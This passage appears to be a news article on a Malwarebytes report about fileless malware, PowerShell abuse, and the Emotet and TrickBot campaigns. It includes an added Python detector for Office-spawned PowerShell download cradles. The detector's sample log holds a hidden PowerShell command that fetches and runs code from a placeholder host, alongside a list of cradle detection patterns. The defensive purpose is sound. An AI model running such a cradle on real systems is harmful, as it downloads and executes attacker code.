These attacks and compromises are growing in sophistication and frequency, and are proving to be particularly successful against businesses because the majority of past security solutions were designed to detect file-based malware that resided on the disk, not in memory, the report warned.
This growing gap in protection has led to a tremendous increase in attacks, compromises, and resulting data theft from fileless attacks, the report said, citing a Ponemon Institute report that said fileless malware attacks account for about 35% of all attacks so far in 2018, and are almost 10 times more likely to succeed than file-based attacks.
Malwarebytes researchers noted that new malware being developed and deployed in the wild has features and techniques enabling attackers to go further than before in terms of infection, detection evasion and persistence.
This “under-the-radar malware” is a cause for concern for businesses today and in the future, the report said, avoiding detection and maintaining persistence by “borrowing the propagation and anti-forensic techniques seen in the complex nation state attacks of the past”.
PowerShell is a trusted administrative scripting tool on Windows systems that can be abused to commit malicious acts, which attackers have been doing for the past few years.
According to the researchers, PowerShell is most often used in conjunction with a macro script in a malicious Microsoft Office document.
Using PowerShell to download and install additional malware gives attackers “extraordinary capabilities”, the report said, such as launching fileless malware attacks directly into memory to evade detection.
Because of the success rate of this type of attack, the report warned that malware of the future is likely to be fileless.
The banking trojan/downloader/botnet known as Emotet, along with its commonly seen accomplice TrickBot, is distributed mainly by email, using malicious Office documents that run PowerShell to download and launch the malware.
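To illustrate the detection side of the Office-document-to-PowerShell chain described above, here is an added example (not code from the report or from Malwarebytes) that flags process-creation events in which an Office application spawns PowerShell with arguments typical of in-memory download cradles. The Sysmon-style field names, the pattern list and the JSON log lines are constructed assumptions for the example.

```python
import json
import re
from dataclasses import dataclass, field

# Office hosts that should rarely spawn a shell, and the PowerShell images to watch.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Command-line fragments typical of in-memory download cradles and hidden execution (assumed list).
CRADLE_PATTERNS = [
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"\biwr\b",
    r"\biex\b", r"invoke-expression", r"frombase64string",
    r"-enc(odedcommand)?\b", r"-w(indowstyle)?\s+hidden", r"-nop\b",
]

# Constructed process-creation events (Sysmon-style fields as JSON lines); not real telemetry.
LOG_LINES = r"""
{"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a')\""}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"}
{"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c echo done"}
""".strip().splitlines()

@dataclass
class Finding:
    image: str
    parent: str
    office_spawned_powershell: bool
    cradle_hits: list = field(default_factory=list)

    @property
    def alert(self) -> bool:
        # Alert only when both signals line up: an Office parent AND cradle-like arguments.
        return self.office_spawned_powershell and bool(self.cradle_hits)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def analyse_event(raw_line: str) -> Finding:
    ev = json.loads(raw_line)
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cmd = ev["CommandLine"].lower()
    hits = [p for p in CRADLE_PATTERNS if re.search(p, cmd)]
    return Finding(image, parent,
                   parent in OFFICE_PARENTS and image in POWERSHELL_IMAGES, hits)

def scan(lines) -> list:
    return [analyse_event(line) for line in lines]

if __name__ == "__main__":
    for f in scan(LOG_LINES):
        print("ALERT" if f.alert else "ok   ", f.parent, "->", f.image, f.cradle_hits)
```

The second line (PowerShell launched by Explorer to run a script file) and the third (Excel spawning cmd.exe without cradle arguments) are kept as non-alerts so the rule stays narrow; an Office parent alone is worth a lower-severity signal in practice.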
The research data shows that Emotet saw a massive increase in business detections between the last three quarters of 2017 and the first three of 2018, with a nearly 88% increase in this threat’s distribution against Malwarebytes business customers.
The data shows that the UK has seen more Emotet infections than any other European country in 2018.
Malwarebytes telemetry indicates that TrickBot malware was detected and removed almost half a million times in the first nine months of 2018, showing that businesses are facing highly dynamic attacks that are modified to avoid detection.
This class of malware requires a new approach to stopping the threats before they create more damage to businesses, the report said, pointing out that the security industry is typically slow to respond to the latest threats, and is rarely able to stop new threats with old technology.
“The security providers of today need to be able to pivot based on the newest threat vector and quickly develop the tools to combat it, because the future is not full of easy-to-detect junkware, but difficult-to-detect, difficult-to-remediate, sophisticated and dangerous malware,” the report said.
However, the researchers said their findings are not all negative, with indications that security is being improved through some technological developments and innovations such as behavioural detection, delivery blocking capabilities, and self-defence capabilities.
These features are effective at combating today’s threats and will soon be needed to build the basis for future developments, such as artificial intelligence being used to develop, distribute or control malware, and the continued development of fileless and “invisible” malware, the researchers said.
According to the report, organisations need to deploy security tools that can modify and refine detection and remediation capabilities.
“We need every aspect of the computing experience to be monitored and secured, including incoming and outgoing traffic to which processes can run and even which files can be downloaded,” the report said.
“In the future, we need more than a shield – we need a smooth orb of protection with no cracks, and a dynamic and reflective skin giving the user a full view of what is out there, what is trying to get in, and what is hiding under the radar.”